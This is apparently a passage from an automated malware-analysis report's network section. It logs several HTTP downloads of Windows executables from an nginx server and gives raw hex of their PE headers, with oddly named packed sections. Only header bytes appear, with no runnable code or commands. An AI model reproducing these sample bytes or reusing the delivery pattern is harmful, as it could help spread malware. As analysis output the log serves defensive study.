bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 d0 49 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4a 00 00 04 00 00 28 a4 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c b9 49 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c b9 49 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 58 04 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 b0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 6b 76 6c 6e 75 77 6d 00 60 19 00 00 60 30 00 00 5e 19 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 6a 66 67 63 67 72 62 00 10 00 00 00 c0 49 00 00 04 00 00 00 f6 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 49 00 00 22 00 00 00 fa 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 16:59:59 GMTContent-Type: application/octet-streamContent-Length: 745472Last-Modified: Thu, 06 Feb 2025 02:47:54 GMTConnection: keep-aliveETag: "67a422da-b6000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 76 74 9e df 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 2a 01 00 00 08 00 00 00 00 00 00 0e 49 01 00 00 20 00 00 00 60 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 0b 00 00 06 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 48 01 00 4b 00 00 00 00 60 01 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 01 00 0c 00 00 00 78 48 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 29 01 00 00 20 00 00 00 2a 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 05 00 00 00 60 01 00 00 06 00 00 00 30 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 01 00 00 02 00 00 00 36 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 64 61 74 61 00 00 00 14 05 00 00 a0 01 00 00 14 05 00 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 00 14 05 00 00 c0 06 00 00 14 05 00 00 4c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 17:00:14 GMTContent-Type: application/octet-streamContent-Length: 1832960Last-Modified: Fri, 07 Feb 2025 16:04:54 GMTConnection: keep-aliveETag: "67a62f26-1bf800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 df 68 a3 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 60 6a 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 6a 00 00 04 00 00 77 21 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 8c 03 00 00 00 a0 24 00 00 04 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2b 00 00 c0 24 00 00 02 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 63 68 6b 76 6d 6d 69 00 60 1a 00 00 f0 4f 00 00 52 1a 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 64 66 6f 7a 66 6a 77 00 10 00 00 00 50 6a 00 00 04 00 00 00 d2 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 6a 00 00 22 00 00 00 d6 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 17:00:15 GMTContent-Type: application/octet-streamContent-Length: 2104320Last-Modified: Fri, 07 Feb 2025 16:05:04 GMTConnection: keep-aliveETag: "67a62f30-201c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 d0 49 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4a 00 00 04 00 00 28 a4 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c b9 49 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c b9 49 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 58 04 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 b0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 6b 76 6c 6e 75 77 6d 00 60 19 00 00 60 30 00 00 5e 19 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 6a 66 67 63 67 72 62 00 10 00 00 00 c0 49 00 00 04 00 00 00 f6 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 49 00 00 22 00 00 00 fa 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 17:00:22 GMTContent-Type: application/octet-streamContent-Length: 2104320Last-Modified: Fri, 07 Feb 2025 16:05:04 GMTConnection: keep-aliveETag: "67a62f30-201c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 d0 49 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4a 00 00 04 00 00 28 a4 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c b9 49 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c b9 49 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 58 04 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 b0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 6b 76 6c 6e 75 77 6d 00 60 19 00 00 60 30 00 00 5e 19 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 6a 66 67 63 67 72 62 00 10 00 00 00 c0 49 00 00 04 00 00 00 f6 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 49 00 00 22 00 00 00 fa 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 17:00:29 GMTContent-Type: application/octet-streamContent-Length: 1832960Last-Modified: Fri, 07 Feb 2025 16:04:54 GMTConnection: keep-aliveETag: "67a62f26-1bf800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 df 68 a3 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 60 6a 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 6a 00 00 04 00 00 77 21 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 8c 03 00 00 00 a0 24 00 00 04 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2b 00 00 c0 24 00 00 02 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 63 68 6b 76 6d 6d 69 00 60 1a 00 00 f0 4f 00 00 52 1a 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 64 66 6f 7a 66 6a 77 00 10 00 00 00 50 6a 00 00 04 00 00 00 d2 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 6a 00 00 22 00 00 00 d6 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 17:00:31 GMTContent-Type: application/octet-streamContent-Length: 2104320Last-Modified: Fri, 07 Feb 2025 16:05:04 GMTConnection: keep-aliveETag: "67a62f30-201c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 d0 49 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4a 00 00 04 00 00 28 a4 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c b9 49 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c b9 49 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 58 04 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 b0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 6b 76 6c 6e 75 77 6d 00 60 19 00 00 60 30 00 00 5e 19 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 6a 66 67 63 67 72 62 00 10 00 00 00 c0 49 00 00 04 00 00 00 f6 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 49 00 00 22 00 00 00 fa 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 17:00:32 GMTContent-Type: application/octet-streamContent-Length: 1832960Last-Modified: Fri, 07 Feb 2025 16:04:54 GMTConnection: keep-aliveETag: "67a62f26-1bf800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 df 68 a3 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 60 6a 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 